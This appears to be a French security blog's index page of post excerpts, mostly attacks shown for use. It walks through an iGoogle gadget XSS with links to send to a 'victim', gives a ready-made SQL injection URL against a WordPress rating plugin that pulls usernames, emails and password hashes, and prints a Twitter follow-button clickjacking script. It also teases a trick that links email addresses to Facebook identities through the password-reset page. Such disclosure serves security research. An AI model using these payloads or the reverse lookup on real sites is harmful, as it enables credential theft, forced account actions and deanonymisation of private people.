iGoogle is a service of Google. Its features include the capability to add web feeds a personalized homepage. Google also allows all users to create a special gadget.

1. Write crafted gadget
2. Submit crafted gadget
3. Share it
4. Exploit it !

Then, we go …

1. Write crafted gadget

I’ve get the “Google News” gadget by downloading the following XML file:

http://www.gstatic.com/ig/modules/tabnews/kennedy/tabnews.xml

and added my <script> at the end like this :

…
ud=K.getString(x),vd=K.getMsg(x),wd=/\.cn$/.test(location.host);wd||!ud||ud==vd?pd():sd(ud); window.updateCustomEdit=kd;window.saveConfig=td;window.hideSettingsBlock=jd;})()</script>
<script>alert(/XSS by @MaKyOtOx/);</script>
<div id=settings_mask onclick="return false;"></div>
<div id=settings_block>
<div id=settings_content></div>
</div>
</Content></Module>

2. Submit crafted gadget

I’ve uploaded my xml here: http://www.makyoto.fr/xss/poc.xml

Then, once I’ve customized my gadget, I’ve submitted it here: http://www.google.com/ig/submit

No error was found in the crafted XML file, so it’s OK, my poc.xml is ready to be used as a gadget ^^

3. Share it

Easy to share with friends this gadget using the official sharing features. The following links can be sent to the victim:

http://www.google.com/ig/adde?moduleurl=www.makyoto.fr/xss/poc.xml%253C&source=imag

or

http://www.google.com/ig/directory?type=gadgets&url=www.makyoto.fr/xss/poc.xml

If you choose to add my gadget, a widget will be now present in the iGoogle dashboard.

4. Exploit it !

You are bad guys …

Google Security Team answered me “the domain in which the feature is hosted – gmodules.com – is specifically meant as a compartmentalized « sandbox » for various types of potentially unsafe, user-controlled content. This domain is isolated from any sensitive content due to the same-origin policy.”

Yes, they’re right because I cannot access to user auth cookies, but I can render and script what I want in the gadget … And, what if an attacker can access to popular gadgets XML files ?

Nevertheless I continue to believe that there is vulnerability because the XML file isn’t sufficiently sanitized before being processed.

Tweets are welcome @MaKyOtOx and @devquotes

Served as found on the interweb :

WordPress « wp star rating » plugin SQL injection

http://yourwordpress/wp-content/plugins/gd-star-rating/ajax.php?_wpnonce=<insert_valid_nonce>&vote_type=cache&vote_domain=a&votes=asr.1.xxx.1.2.5+limit+0+union+select+1,0×535242,1,1,co

ncat(0x613a313a7b733a363a226e6f726d616c223b733a323030303a22,substring(concat((select+concat(user_nicename,0x3a,user_email,0x3a,user_login,0x3a,user_pass)+from+wp_users+where+length(user_pass)%3E0+order+by+id+limit+0,1),repeat(0×20,2000)),1,2000),0x223b7d),1,1,1+limit+1

A new follow button which allow to instantly follow a user is now available. The particularity of this new button ( so does google +1) is that user don’t need to go on Twitter.com website everythings i handled in iframe.

A french pentester realeased a POC ( prooof of concept) of the vulnerabilty :

Here is how it’s work :

• You set the iframe fully transparent/invisible via CSS.
• You capture the mouse event.
• When the user move the mouse, you move the twitter button iframe in order it always stay under the cursor.
• If the user click somewhere on your page, he will automatcly follow your account.

Here is the code :

if (!document.getElementsByClassName){
        document.getElementsByClassName = function(classname){
                for (i=0; i < document.getElementsByTagName("*").length; i++)
                {
                        if (document.getElementsByTagName("*").item(i).className == classname){
                                return new Array(document.getElementsByTagName("*").item(i));
                        }
                }
        }
}

var twitterFollowIframe = document.getElementsByClassName('twitter-follow-button')[0];
twitterFollowIframe.style.position = 'absolute';
twitterFollowIframe.style.opacity = '0.2';
twitterFollowIframe.style.filter = 'alpha(opacity=20)';

document.onmousemove = function(e){
        if ( !e ) e = window.event;
        twitterFollowIframe.style.left = e.clientX - 20;
        twitterFollowIframe.style.top = e.clientY - 10;
}

You can find the proof of concept at this page : http://serphacker.com/twitter-follow-clickjacking.html

Destination server is down atm here are the POC source code with 20% of opacity:

SERP Hacker



Tested on Firefox 3 and IE7

Just move the mouse and click somewhere, you will automatically follow my twitter account if you are already connected on twittR, remember we can make the button totally hidden by setting opacity 0.


Follow SERP Hacker

Hi,

You may have heard about a recent security hole in facebook.com (you know, the #2 website from Alexa ranks). French president Nicolas Sarkozy and Facebook’s CEO Mark Zuckerberg pages were recently hijacked.

How it works:  hackers have used a cross site scripting vulnerability (XSS) for stealing cookie.

+

=

Read the rest of this entry

In most network applications, managing incoming flow is an important thing, and is a quite hard thing to set up. In case your algorithm is too restrictive, you will drop too much connection, and in case it’s too permissive, you will accept undesired connections. The real need is to tell your application: « Accept N connection(s) in a X second(s) time range ».

Concept

The way you should decide if a connection have to be dropped or not is looking in an historic of X second(s) how many connection(s) from an IP have been performed, and then deducing the count. This is the « simple » algorithm that does that:

Read the rest of this entry

Today I got a little vuln for you. Nothing critical but a privacy hole into Facebook. Nice, isn’t it? We’re dealing with facebook privacy, that’s why this is important. This hint will allow you to know who’s behind any email address.

You want to know the name of the person who’s behind [email protected]. Seems quite hard to find something related to this email. You can at least try to use google or most common reverse identity website:

• http://www.google.fr/search?q=zibou75%40hotmail.com
• http://www.spokeo.com/email/[email protected]
• http://www.123people.fr/s/zibou75

But let’s brain: most of common people are now on Facebook so let’s have a try. Not using the search function of Facebook but using the reverse function implemented in the reset password page.

Read the rest of this entry